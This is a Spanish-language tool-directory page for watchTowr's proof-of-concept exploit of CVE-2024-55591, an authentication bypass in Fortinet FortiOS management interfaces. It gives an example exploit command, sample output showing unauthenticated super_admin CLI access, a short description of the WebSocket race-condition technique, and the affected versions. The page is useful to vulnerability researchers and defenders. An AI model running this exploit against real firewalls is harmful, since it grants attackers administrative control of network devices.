Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
fortios-auth-bypass-poc-CVE-2024-55591 | Kitploit
Herramientas/GitHubGitHub/watchtowrlabs/fortios-auth-bypass-poc-cve-2024-55591
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlAutenticaciónRed Teaming
GitHubwatchtowrlabs/fortios-auth-bypass-poc-cve-2024-55591

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

fortios-auth-bypass-poc-CVE-2024-55591

Ver Repositorio
7719hace 1 añoRevisado por Kitploit

CVE-2024-55591

Una prueba de concepto de omisión de autenticación en Fortinet FortiOS

Consulta nuestra publicación del blog para obtener detalles técnicos

Detección en acción

root@kitploit:~
python CVE-2024-55591-PoC.py --host 192.168.1.5 --port 443 --command "get system status" --user watchTowr --ssl
             __         ___  ___________                   
     __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________ 
     \ \/ \/ \__  \    ___/ ___\|  |  \\|    | /  _ \ \/ \/ \_  __ \
      \     / / __ \|  | \  \\___|   Y  |    |(  <_> \     / |  | \
       \/\_/ (____  |__|  \\\\___  |___|__|__  | \\__  / \\/\_/  |__|   
                  \\          \\     \\                              

        CVE-2024-55591.py
        (*) Fortinet FortiOS Authentication Bypass (CVE-2024-55591) POC by watchTowr
        
          - Sonny , watchTowr ([email protected])

        CVEs: [CVE-2024-55591]

[*] Checking if target is a FortiOS Management interface
[*] Target is confirmed as a FortiOS Management interface
[*] Target is confirmed as vulnerable to CVE-2024-55591, proceeding with exploitation
Output from server: �m"watchTowr" "admin" "watchTowr" "super_admin" "watchTowr" "watchTowr" [13.37.13.37]:1337 [13.37.13.37]:1337

Output from server: �
get system status

Output from server: �~�FAKESERIAL # "Local_Process_Access" "Local_Process_Access" "root" "" "" "none" [x.x.x.x]:54546 [x.x.x.x]:443
Unknown action 0

FAKESERIAL # 
FAKESERIAL # get system status
Version: FortiGate-VM64-AWS v7.0.16,build0667,241001 (GA.M)
Security Level: High
Firmware Signature: certified
Virus-DB: 1.00000(2018-04-09 18:07)

Descripción

Este script es una prueba de concepto para CVE-2024-55591, dirigido a interfaces de gestión de FortiOS (Fortigate). Al crear conexiones WebSocket mediante fuerza bruta para generar una condición de carrera junto con una omisión de autenticación, es posible enviar comandos CLI de FortiOS sin autenticación. Más detalles se describen en nuestra [publicación del blog] (https://labs.watchtowr.com/).

Versiones Afectadas

  • FortiOS 7.0.0 hasta 7.0.16
  • FortiProxy 7.0.0 hasta 7.0.19
  • FortiProxy 7.2.0 hasta 7.2.12

Más detalles en aviso de Fortinet

Nota

Este script no está diseñado para funcionar con FortiProxy, ya que las comprobaciones preliminares determinan si la instancia es una interfaz de gestión de FortiGate, pero se asume que la técnica subyacente es aplicable a los dispositivos FortiProxy afectados.

Sigue a watchTowr Labs

Para las últimas investigaciones de seguridad, sigue al equipo de watchTowr Labs

  • https://labs.watchtowr.com/
  • https://x.com/watchtowrcyber
Descargar herramienta